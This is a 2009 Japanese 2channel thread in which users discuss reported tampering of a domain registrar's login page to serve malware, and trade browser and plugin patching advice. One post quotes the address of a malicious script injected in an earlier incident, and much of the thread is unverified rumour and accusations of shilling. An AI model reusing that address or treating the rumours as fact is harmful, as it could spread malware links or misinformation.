367:名無しさん@お腹いっぱい。
09/07/08 01:03:30 0
何もなかったから、アナウンスなど無くて当然。
これは、捏造事件です。


368:名無しさん@お腹いっぱい。
09/07/08 01:08:11 0
>>367
隠蔽する気マンマンだなぁ

369:名無しさん@お腹いっぱい。
09/07/08 01:10:04 0
公的ぽいところに届出が無い限り、
がせだと思って良いかな?
URLリンク(www.ipa.go.jp)

370:名無しさん@お腹いっぱい。
09/07/08 01:11:38 0
釣りにマジレスするのもなんだけど
ガセだ捏造だと主張する人は
魚拓もグルだと言うつもりなんだろうか

371:名無しさん@お腹いっぱい。
09/07/08 01:12:48 0
土下座しろとかは言わない もともと、ここはプロかハイアマが使うんだから、
淡々と、しかし正確に事実関係とか告知すれば足ると思うし、かつ必要だと思うんだ

372:名無しさん@お腹いっぱい。
09/07/08 01:16:17 0
>>370
釣りにマジレスすんなよ、と言わせていただこう

373:名無しさん@お腹いっぱい。
09/07/08 01:18:50 0
スラッシュドットジャパンでよければ
URLリンク(slashdot.jp)

374:名無しさん@お腹いっぱい。
09/07/08 01:20:17 0
>>360
それはともかく て。違いが分からないの?

375:名無しさん@お腹いっぱい。
09/07/08 01:33:00 0
徐々にニュースサイト系に情報広がってるね
これがVD流の七夕祭りですか

376:名無しさん@お腹いっぱい。
09/07/08 01:35:33 0
>>369
脆弱性有無の調査方法
DNSキャッシュポイズニングの脆弱性の有無を確認
URLリンク(www.ipa.go.jp)

* porttest.dns-oarc.net -- Check your resolver's source port behavior
* URLリンク(www.dns-oarc.net)

* txidtest.dns-oarc.net -- Check your resolver's transaction ID behavior
* URLリンク(www.dns-oarc.net)

* IANA ― Cross-Pollination Scan
* URLリンク(recursive.iana.org)

この3つで確認すればいいのかな?

377:名無しさん@お腹いっぱい。
09/07/08 01:42:17 0
さっさと仕事しないとGENOウィルスみたいにウィルスの名前になるとかすっげえ不名誉なことになる悪寒

378:名無しさん@お腹いっぱい。
09/07/08 01:43:34 0
コードは確かに書き加えられてたよ。
ここに貼られてたソースもハッキリ見た。

昨夜9時頃ログインしたが今のところ何ともない。
今後どうなるかはわからんが...
明日俺のサイト書き換えられてたりして...orz

379:名無しさん@お腹いっぱい。
09/07/08 01:43:58 0
「VDウイルス」
「デジロウイルス」

悪くないな

380:名無しさん@お腹いっぱい。
09/07/08 01:58:29 0
コードが書き換えられていたのなら、

それを修正対応処理した時点でデジロが何かアナウンスして当然でしょ。
アナウンスが無いのはコード書き換えなど無かったからです。
他社工作員の捏造にだまされないように、

381:名無しさん@お腹いっぱい。
09/07/08 02:00:36 0
>>376は全然ちがったみたい
>>369見る前はこれかと思ったんだけど

でも、ログインは関係ないのか?
もしかして、ServerとClientは
別物と何度言ったら(nyってやつ?

382:名無しさん@お腹いっぱい。
09/07/08 02:06:45 O
>>380

ノシ >>286

383:名無しさん@お腹いっぱい。
09/07/08 02:08:33 0
>>286の読み方がわからない

384:名無しさん@お腹いっぱい。
09/07/08 02:12:13 0
隠蔽しようと頑張ってるとしか思えんわ

385:名無しさん@お腹いっぱい。
09/07/08 02:48:42 0
なんだかすごいことになったみたいだね
よりによって久々にDNSいじるためにおととい昨日今日とログインしたというのに…
firefoxだけど大丈夫なのかしら

386:名無しさん@お腹いっぱい。
09/07/08 02:52:26 0
>>340
まあそういう穴もあるんだがGeno系は違う場合もあるからねえ
今回もアプリよりFTPとかそっちを疑ったほうがいいのかもしれない
Genoのときもそうだったけど被害サイトが特定のCMSや
Webサーバじゃなかったんで最初混乱した

データを抜いたんじゃなくてPHP書き換えちゃってるんだしね
こういう流れも考えられるよってかんじで参考程度だけど
中の人のPCがGeno系に感染→FTPパスとられる→サーバ側改ざん(新型うめこみ)

387:名無しさん@お腹いっぱい。
09/07/08 02:52:41 0
>>385
ログイン処理の部分で書き換えられていたならばアウト
報告が無いのでどこまで書き換えられたかは判らないが。

388:名無しさん@お腹いっぱい。
09/07/08 02:53:34 0
>>385
FirefoxであればAdobe製品を最新にしていれば
クライアント側は大丈夫かもしれない

389:名無しさん@お腹いっぱい。
09/07/08 02:57:00 0
>>387
そうなのか…ありがとう
JSは大丈夫だったとしてもログイン処理のほうが問題だよね
こればっかりはどうしようもないから報告待ちするしかないなぁ…

390:名無しさん@お腹いっぱい。
09/07/08 02:59:20 0
>>388
GENOの件でReaderとFlashPlayerは最新のはずだからそこは大丈夫そう
教えてくれてありがとう

391:名無しさん@お腹いっぱい。
09/07/08 03:13:24 0
去年改ざんされた広告サーバのIPアドレスを逆引きすると、sakura1.digi-rock.com。
今回改竄されたVDのサーバが、sakura2.digi-rock.com。
また、さくらインターネットに置いているサーバだな。

392:名無しさん@お腹いっぱい。
09/07/08 03:33:50 0
>>388
いや、Adobe製品・・・というか全てのリッチコンテンツ用プラグインを削除しないと安心は出来ないだろ。どうせまだ穴があるに決まってる。
HTML/JavaScriptパーサバグは流石にもうIEくらいしか食らわないだろうけど、プラグインは枯れるどころか不安定機能が絶賛増加中なわけで


393:名無しさん@お腹いっぱい。
09/07/08 03:39:37 0
('A`)アアアァァァァァァァァァァァ....
.
三年寝太郎の俺が
久しぶりに土曜日からずっとアレコレやってたらこの騒ぎ。。。

流し読みだけど↓で合ってる?


 login.phpが書き換えられた。
 
 ① 変なJavaScriptが埋め込まれてる。
    → 変なActiveXが実行される。
     → IEの人は要注意。(魚拓も危険)
      → ともかく全員これを当てておけ。 URLリンク(support.microsoft.com)
 
 ② login.phpが書き換えられたって事は…
    → ログイン危険。
    → というか、何もかもやばいだろ\(^o^)/


394:名無しさん@お腹いっぱい。
09/07/08 03:43:12 0
>>392
そんなあなたにFirefox+NoScript(フレーム禁止も設定で追加)

395:名無しさん@お腹いっぱい。
09/07/08 03:47:41 0
>>394
既にOperaの標準機能でプラグイン停止して運用してる
外部拡張に頼らず本体機能だけでプラグインのON/OFFを切り替えられるから、そういう意味ではかなり便利

396:名無しさん@お腹いっぱい。
09/07/08 03:49:43 0
>>394
ドメイン毎に設定できるのが魅力だけど
許可サイトに加えていくなど、ある程度熟練した人向けだと思う
しっかり設定しないと、動画も表示されないからね

397:名無しさん@お腹いっぱい。
09/07/08 03:50:45 0
>>393
変なActiveXだけじゃなく変なPDFと変なSWFもあったみたいだよ
どれかにヒットすれば感染おめでとう

サーバ側についてはGenoと同じでなかったことにしようとしてるみたいだね
価格.comの改悪型Genoメソッドだ

他の攻撃サイトでもIEをターゲットにしているものは多いし
IEをメインブラウザとして使うのは危ないね

398:名無しさん@お腹いっぱい。
09/07/08 03:59:23 0
             /)
           ///)
          /,.=゙''"/
   /     i f ,.r='"-‐'つ____   キャッシュ消せばいいんだよ!
  /      /   _,.-‐'~/⌒  ⌒\
    /   ,i   ,二ニ⊃( ●). (●)\
   /    ノ    il゙フ::::::⌒(__人__)⌒::::: \
      ,イ「ト、  ,!,!|     |r┬-|     |
     / iトヾヽ_/ィ"\      `ー'´     /


399:動揺激しい、さくらスレに誤爆したw
09/07/08 04:10:16 0
thx、何でGENOの話をしてるのか分かってなかった。
pdf,swfもあったのね。


 login.phpが書き換えられた。
 
 ① 変なJavaScriptが埋め込まれてる。
    → 変なActiveXが実行される。
     → IEの人は要注意。(魚拓も危険)
      → ともかく全員これを当てておけ。 URLリンク(support.microsoft.com)

    → 変な pdf と swf を読まされる。
     → 例のGENO系。既に最新のAdobeReaderとFlashPlayerになってるよな!?
      → Adobe製品は自動更新間隔の期間が長いので、常に自分で最新を当てにいけ。
 
 ② login.phpが書き換えられたって事は…
    → ログイン危険。
    → というか、何もかもやばいだろ\(^o^)/

400:名無しさん@お腹いっぱい。
09/07/08 04:14:03 0
>>396
そうなんだよね
わけわかめな人についてはNoScriptは入れないほうが良いとおもう

ただ、IEが一番狙われてるのは確実だからNoScriptなしでも
Firefox(その他のブラウザ含む)のがマシと考えられる
Firefoxに関してはGoogleセーフブラウジングである既知の危険ドメインは
カットできるんでそういう意味でも多少安全
IE8にもそういう機能がついてるけど踏まないと報告できないようなので
少なくとも一回罠にかからなきゃいけないんだよね・・・
それとも見落としていただけで報告サイトあるんだろうか

どっちみち今回のような未知のドメインには対応してないので基本的な対策は必要だけどね

ただ、Firefoxが良いから使えっていうポジティブな理由じゃなく
IEが危なすぎるからやめろっていうネガティブな理由なんで他ブラウザでも構わない
Google Chromeはたとえブラウザの脆弱性があったとしても
サンドボックス化されていて実行する権限が無いので動かないみたいな話だったかな

401:名無しさん@お腹いっぱい。
09/07/08 04:18:55 0
このあたりに今回の件が書いてある
URLリンク(ilion.blog47.fc2.com)
URLリンク(www.st.ryukoku.ac.jp)
URLリンク(lineage.paix.jp)

402:名無しさん@お腹いっぱい。
09/07/08 04:19:26 0
>>399
ここの人は大丈夫だと思うけど、念のためGeno関連補足
AdobeReaderに関しては今後また狙われそうなJavaScript機能のオフ推奨
また、Reader自体使用していないならアンインストールしたほうが無難
メーカー製PCの場合は勝手に入ってることが多いので使用していなくても
インストールされていないか要確認

403:名無しさん@お腹いっぱい。
09/07/08 04:39:35 0
これってreader入れてなければflashプレイヤー入ってても感染しないの?

404:名無しさん@お腹いっぱい。
09/07/08 04:40:40 0
>>399
これってブラウザのスクリプト切ってても感染するの?

405:名無しさん@お腹いっぱい。
09/07/08 04:42:23 0
>403
だから FlashPlayer は最新にしろとあれほど

406:名無しさん@お腹いっぱい。
09/07/08 05:11:23 0
要するにAdobe私ねってことだ

407:名無しさん@お腹いっぱい。
09/07/08 06:27:28 0
>>405
してるよ。
IE6
flashplayer最新
reader無し

408:名無しさん@お腹いっぱい。
09/07/08 06:52:32 0
URLリンク(support.microsoft.com)
をやってないならアウト

409:名無しさん@お腹いっぱい。
09/07/08 07:12:59 0
>>408
やってないみたいだけど感染してるかどうかってどこで見分けるの?
GENOウイルスはレジストリエディタが立ち上がらなくなるって聞いたけど立ち上がるし
アプリケーションが糞重くなるって聞いたけど特に変化無いし
PeerGurdian2で見てても特に変な動きしてないみたいなんだけど。

410:名無しさん@お腹いっぱい。
09/07/08 07:22:13 0
動画見ないからそもそもフラッシュのプラグイン入れてないなw

411:名無しさん@お腹いっぱい。
09/07/08 08:00:03 0
横になったら寝てた
>>400
>Firefoxに関してはGoogleセーフブラウジングである既知の危険ドメインは
カットできるんでそういう意味でも多少安全
寝る前に、そういうサイト踏んだら、そうなった
今IE7でやってみたら、危険なドメイン開いた
>>408やってなかったからか

412:名無しさん@お腹いっぱい。
09/07/08 08:11:37 0
>>409
バックドアかキーロガーだから見つかりにくいように作ってるだろう。
regeditが起動しないみたいなあからさまな挙動はない。
私は感染してないので、がんばって見分け方を見つけてね。

413:名無しさん@お腹いっぱい。
09/07/08 08:24:11 0
見分け方は、sqlsodbc.chmのファイルサイズの確認でしょう
>>411はただのエロサイトだった
それを今回のアドレスでやればいいのかな

414:名無しさん@お腹いっぱい。
09/07/08 09:15:22 0
うっかり砂箱の中で>>408やったらループった
試すアドレスは >>286のでいいのか
FireFox、Chromeはブロックしてくれたけど
IEが接続できなきないだけで、もう一つ分からない
IE8にしないと駄目か



415:名無しさん@お腹いっぱい。
09/07/08 10:01:07 0
IE8にしてみたけどInternet Explorer ではこのページは表示できません
って出るから、これだとブロックしてくれてるのかどうか分からん
うちのモデムの接続もともと不具合だし

416:名無しさん@お腹いっぱい。
09/07/08 10:05:43 0
なんでここがさくらのサーバ使ってんのかと思ったら、
自前のだと良く落ちるからかな?

417:名無しさん@お腹いっぱい。
09/07/08 10:06:38 0
で、結局何?今回の騒動は釣りじゃないのか?

なんか最近思うんだが、ムームードメインとお名前が必死じゃないか?

おれはムームーでのcomドメイン管理を止めた。

使い勝手の悪いムームードメインから
デザインが悪くても管理の楽なバリュードメインにしたよ。
おれと同じようなユーザーは多数いるだろうね。

今回の件、ムームー社員が工作しているように見えるから不思議。

418:名無しさん@お腹いっぱい。
09/07/08 10:10:07 0
それより、お前らどこに引っ越したんだよ

419:名無しさん@お腹いっぱい。
09/07/08 10:10:41 0
■Slashdot.jp
VALUE DOMAIN のログイン ページ改ざん
URLリンク(slashdot.jp)

■リネージュ資料室
VALUE DOMAINログインページ改竄
URLリンク(lineage.paix.jp)

■セキュリティホールMEMO
バリュードメインでこの欠陥を利用した攻撃が発生
URLリンク(www.st.ryukoku.ac.jp)

420:名無しさん@お腹いっぱい。
09/07/08 10:14:45 0
早く公表してくれ


5000人以上の個人情報を保有しているだろうから法的に裁かれるぞ


今回の件ばかりは隠すことは出来ない


下手すれば・・・

421:名無しさん@お腹いっぱい。
09/07/08 10:16:01 0
ゴクリ...

422:名無しさん@お腹いっぱい。
09/07/08 10:28:29 0
釣られないぞ・・・

423:名無しさん@お腹いっぱい。
09/07/08 10:34:25 0
問題が発生した時点でのウイルス検体を拾った人が大勢いる
あとになればなるほど、返答に窮するようになるかもしれないのに、何をやってるんだ

zxshell晒しsage

424:名無しさん@お腹いっぱい。
09/07/08 10:35:55 0
おっと早漏

△ウイルス検体を拾った人
○ウイルス検体を(騒動を察知してわざわざ)拾いにいった人

425:名無しさん@お腹いっぱい。
09/07/08 10:53:53 0
中国か、GMOに身売りになったらイヤだな

426:名無しさん@お腹いっぱい。
09/07/08 11:06:16 O
デジロウイルスのアナウスまだぁ?

427:名無しさん@お腹いっぱい。
09/07/08 11:35:27 0
対策してて大丈夫な人、ここ見ても平気か試してくれよ
URLリンク(dnf.wikiwiki.jp)

428:名無しさん@お腹いっぱい。
09/07/08 12:01:22 0
URLリンク(so.7walker.net)
上のソースで問題の部分は./er/pr.phpだよね

429:名無しさん@お腹いっぱい。
09/07/08 12:03:55 0
どうしちゃったんだよVALUEDOMAIN…

430:名無しさん@お腹いっぱい。
09/07/08 12:07:38 0
>>428はURL間違ってね?

431:名無しさん@お腹いっぱい。
09/07/08 12:22:32 0
デジロックは公式アナウンスをしない気か?
GIGAZINEとか他のニュースサイトでも取り上げてくれれば、
ニュー速とかにスレが立って、デジロも無視できない状態になるだろうに・・・。

あー、乗り換えるのめんどうだし、デジロックには頑張ってほしいよ。

432:名無しさん@お腹いっぱい。
09/07/08 12:26:31 0
公式アナウンスしないっていうより、できないのかも
何が起こったのか把握できる技術者が外注にもいないんだよ、きっと

433:名無しさん@お腹いっぱい。
09/07/08 12:29:40 0
デジロが無視できない状態にしたいのであれば、
国に動いてもらえばよかろう

434:名無しさん@お腹いっぱい。
09/07/08 12:41:50 0
国に動いてもらいたいなら正式に通報しろよ
誰もやってないんだろ

435:名無しさん@お腹いっぱい。
09/07/08 12:44:57 0
>>430
>URL間違ってね?
って、そういう意味か
>>427のソースはこっち
view-source:URLリンク(dnf.wikiwiki.jp)
>>428で問題だったインラインフレームタグって
./er/pr.phpだろう?
まったく同じのはなかったけど
それで安全ってことでいいのか?
こっちはiframeどころかHTMLも碌に
知らないんだから分かる人よろしく
直踏みの感想は特に問題なかったけど
当方の環境で問題なしとしか言えない

436:名無しさん@お腹いっぱい。
09/07/08 12:47:22 0
>>434
誰もやってないだろうね
ここのユーザーは、基本的に法の知識も低い傾向があるしな

437:名無しさん@お腹いっぱい。
09/07/08 12:51:27 0
>>436
お前とかな

438:名無しさん@お腹いっぱい。
09/07/08 12:54:07 0
お子様が紛れ込んでいるようです。

439:名無しさん@お腹いっぱい。
09/07/08 12:54:28 0
法の知識が低いとなんかまずいのかね?
頭でっかちの知識自慢は嫌われますよ~

440:名無しさん@お腹いっぱい。
09/07/08 12:56:55 P
>>436
ググレカスの人ですか?

441:名無しさん@お腹いっぱい。
09/07/08 13:00:04 0
んで今はどんな状況よ

FTP侵入

サイト改竄

ウイルス埋め込み

だけならいいが、
FTPに入られてDBに接続するプログラムを見て、
DBの顧客情報をもってかれていたら終了だろ

442:名無しさん@お腹いっぱい。
09/07/08 13:03:45 0
関係あるかな?

韓国で大規模サイバー攻撃、大統領府など被害
URLリンク(www.nikkei.co.jp)

443:名無しさん@お腹いっぱい。
09/07/08 13:04:07 0
アナウンスないと、突っ込んだ話は正直わからないよねぇ

444:名無しさん@お腹いっぱい。
09/07/08 13:05:49 0
>>440
>>141で規約に謳ってあると言われて
いなくなっちゃったよ
ソース>>142

445:名無しさん@お腹いっぱい。
09/07/08 13:19:02 0
規約の「責任の限界」の内容って、「無責任」とどう違うのかだれか教えて

446:名無しさん@お腹いっぱい。
09/07/08 13:42:26 0
>>445
責任と取るべく努力はするが、ダメだったら許してね
ってことだが、実態は無責任に近いなw

さすがにサーバー落ちたとかそういうレベルじゃなく、資産が他人に盗まれる
可能性を含んだ問題だからなぁ、fc2かgodaddyにでも移動するか・・・

447:名無しさん@お腹いっぱい。
09/07/08 13:47:29 0
ネームサーバ障害の徹底放置しかり、この状況下で移管は止めんが移管先の話は
該当スレでどうぞ。

デジロ社員といつもの頭おかしい子の「他社工作員乙」ってワードの呼び水になるん
でそういう話は該当スレで頼む。

448:名無しさん@お腹いっぱい。
09/07/08 13:49:52 0
レンタルアクセス解析サービス 謎のあやしい文字 & う ・・・
いまは、でない。気のせいだったのか・・・ 気のせいだったんだろうなぁ
でも、どこででたんだろう・・・ いまいち記憶が・・・

449:名無しさん@お腹いっぱい。
09/07/08 13:56:22 0
今のとこ実害報告ないけど、実際に実害報告出だしたらどう命名されるんだろ

DigiRoウイルス

かなぁ?

450:名無しさん@お腹いっぱい。
09/07/08 13:59:25 0
大阪ウィルスだろww

451:名無しさん@お腹いっぱい。
09/07/08 14:03:15 0
移管しようにも怖くてログインすらできんのだが…
ある程度の安全が確保されてから全移管する

452:名無しさん@お腹いっぱい。
09/07/08 14:19:20 0
>>451
全部一気に移管するならログインしても問題ないだろ
終わってしまえばもう関係ないんだからさ

453:名無しさん@お腹いっぱい。
09/07/08 14:35:39 0
俺も怖くてログインできないクチなんだよな…
入金したから、その申請をしたかったんだが…

正式なアナウンスしないつもりなのかな?

454:名無しさん@お腹いっぱい。
09/07/08 14:42:42 0
ある程度まとまった数のユーザーに実際の被害が出なけりゃこのまま黙殺だろ

被害が出たらそりゃ凄い事になりそうだけどなw

455:名無しさん@お腹いっぱい。
09/07/08 14:43:05 0
ソースは2ちゃんとか走りすぎじゃない?
何処も自身で確認した訳でもなく、そーすは2ちゃんって言ってるじゃん
しかも個人ブログとかどう信用しろっていうんだ

>>451
俺ログインしまくってるけど特になにもないよ

456:名無しさん@お腹いっぱい。
09/07/08 14:45:43 0
何か言う前に同一スレ内くらいざっと読めよ

457:名無しさん@お腹いっぱい。
09/07/08 14:46:10 0
仮に改竄時にパスを抜かれてたとしてだ、
現時点でコード削除されていて、再発していないということは、デジロ側で抜かれたパス変更してるはず。
なんで待ってないでさっさとログインしてパス変えちゃえば心配ないと考える。
むしろ何かされるの待ってる方がマゾ。

458:名無しさん@お腹いっぱい。
09/07/08 14:49:38 0
>>456
スレ全部読んだけど、上でも誰かいってたけど原爆ネタと同じ流れじゃん
魚拓も含めて。

459:名無しさん@お腹いっぱい。
09/07/08 14:50:18 0
前にxreaで運営しているネトゲサイトだかなんだかにスクリプト埋め込まれたのも同じ方法じゃないか?

あんときは http://1039045744:88/jp.js だったけど

xreaはこんときスクリプトの脆弱性をついたXSSって発表してるから今回もそうかね?
だとしたら間抜け以外の何モンでもないな

URLリンク(sb.xrea.com)

460:名無しさん@お腹いっぱい。
09/07/08 14:51:01 0
ミスリードにも程がある

461:名無しさん@お腹いっぱい。
09/07/08 14:52:00 0
コンタクトフォームで聞いたが、

--------------------------------------------------------------------
お世話になっております。

お問い合わせについてですが、先ほど問題無くログイン可能でございました。

セキュリティソフトなどの警告も無く、現状ではユーザー様から連絡いただいた症状を確認できませんでした。

ご確認の上、適宜ご作業いただければ幸いです。
---------------------------------------------------------------------

「現状ではユーザー様から連絡いただいた症状を確認できませんでした。」
と言う言葉を信じるなら、ガゼじゃないのか?
妬みを持つユーザーから

462:名無しさん@お腹いっぱい。
09/07/08 14:54:48 0
godaddyは以前クラックされてたよな。
FC2は安いしVDに近い操作ができそうだが、実際どうなのかな

463:名無しさん@お腹いっぱい。
09/07/08 14:58:21 0
こんな時に何だけど、ネームサーバ障害はやっぱり完全放置なんだよね?

464:460
09/07/08 15:01:29 0
サポートに質問してみたら速攻レスきて驚いた・・・

[2009-07-08 14:51:02] サポートからメッセージが追加されました。

お世話になっております。

お問い合わせについてですが、弊社にてサポート業務などにおいて数分単位でログインページは常時確認しております
が、ユーザー様よりご連絡いただいている「改竄」は確認できませんでした。

ご確認の上、適宜ご作業いただければ幸いです。

2ちゃんを信じるか公式のコメントを信じる最終的には個々の判断だけど
もし事実じゃないとしたら、いくら2ちゃんねるだからといって悪質にも程があると思う。
ミスリードに釣られて煽った人間も同罪。

465:名無しさん@お腹いっぱい。
09/07/08 15:02:35 0
魚拓はどうなの
怖くてみれない

466:名無しさん@お腹いっぱい。
09/07/08 15:04:54 0
>>465
スレの内容どおりだよ、マルウェアが仕込まれたjsファイルへのリンクが埋め込まれてる
ブラウザのjavascriptを切った状態でアクセスしてソースを確認すればいい

467:名無しさん@お腹いっぱい。
09/07/08 15:08:26 0
やはり、改竄はなかった。サポートが正式回答しているではないか。
他社工作員乙。捏造するにも程がある。いい加減にしろ。

468:名無しさん@お腹いっぱい。
09/07/08 15:13:06 0
firefox+Noscriptで魚拓見てきたけど
たしかにあったねs.jsっていうの
この魚拓URL見せたらなんて言うんだろう?

469:名無しさん@お腹いっぱい。
09/07/08 15:14:02 0
ソースのログインフォームの下あたりだよね

470:名無しさん@お腹いっぱい。
09/07/08 15:16:09 0
魚拓が捏造でしょ
デジロが正式アナウンスしない限り、他社工作員の捏造

471:名無しさん@お腹いっぱい。
09/07/08 15:19:40 0
改ざんされて被害にあったっていってたひとがふしあなで書き込むといいんじゃない?

472:名無しさん@お腹いっぱい。
09/07/08 15:20:31 0
捏造って流れで押そう! ってのがトレンドなんだw

473:名無しさん@お腹いっぱい。
09/07/08 15:21:27 0
ホメ殺しでしょ、極端なデジロ擁護で逆に反感を煽ってるんだよ

474:名無しさん@お腹いっぱい。
09/07/08 15:23:52 0
ははww
前スレ終盤あたりからだよねその流れww

475:名無しさん@お腹いっぱい。
09/07/08 15:23:53 0
極端なデジロ擁護っていうのがよくわからない

476:名無しさん@お腹いっぱい。
09/07/08 15:23:58 0
魚拓が捏造可能って話にしちゃうとそれはそれですごい面倒な話になる気がする

477:名無しさん@お腹いっぱい。
09/07/08 15:27:07 0
社員乙っていわれるようにレスしてんじゃないの
原爆の時みんなにスルーされてたやつじゃない?

478:名無しさん@お腹いっぱい。
09/07/08 15:27:35 0
魚拓がねつ造可能だと通報しろ。そっちの方が世間的には盛り上がるぞw

479:名無しさん@お腹いっぱい。
09/07/08 15:28:59 P
>>462
FC2は複数のドメイン管理で切り替えが必要な時点でクソ。
個人的にはムームーの方がよっぽど使いやすいレベル。


480:名無しさん@お腹いっぱい。
09/07/08 15:29:19 P
おれ、リアルタイムで人柱やった。当時、その追加されてるソースも確認した。
で、>>464の報告が事実だと仮定して、サポートが「確認できなかった」のが本当ならば、
仕掛けた本人が消したか、もしくはデジロックの担当部署が当該ソースを削除して、
サポートにその申し送りがされてないとしか考えられない。

とことん「改竄がなかった」ことにしたい輩がいるけれど、
俺から見れば、むしろそうやってうやむやにしたい奴のほうが悪質に見える。

>>473
その可能性はあるね。頭がおかしいとしか言いようがない。

481:名無しさん@お腹いっぱい。
09/07/08 15:33:49 0
自分で確認できなかった事と事実をなかったことにしろっていうのは違うだろ。
公式がないって言ってんのを名無しを信じろっていうほうが無理だろ

482:名無しさん@お腹いっぱい。
09/07/08 15:34:15 0
なかったことにしたい人が必死すぎてこわい

483:名無しさん@お腹いっぱい。
09/07/08 15:34:58 0
俺から見れば名無しで書き込んで、信じろっていうやつのほうが頭おかしいと思うが

484:名無しさん@お腹いっぱい。
09/07/08 15:35:42 0
>>480
お金を取って、ログまで残して回答してるのと、
2chのどっちを信るかろと言えば、前者だろ。

ちょっと考えれば、value-domainってlocalアドレスを
自分のPCで書き換えれば、URI付き魚拓なんて捏造いくらでもできるからな。

絶対ガセ

485:名無しさん@お腹いっぱい。
09/07/08 15:35:51 0
>>482
頭大丈夫?


次ページ
最新レス表示
レスジャンプ
類似スレ一覧
スレッドの検索
話題のニュース
おまかせリスト
オプション
しおりを挟む
スレッドに書込
スレッドの一覧
暇つぶし2ch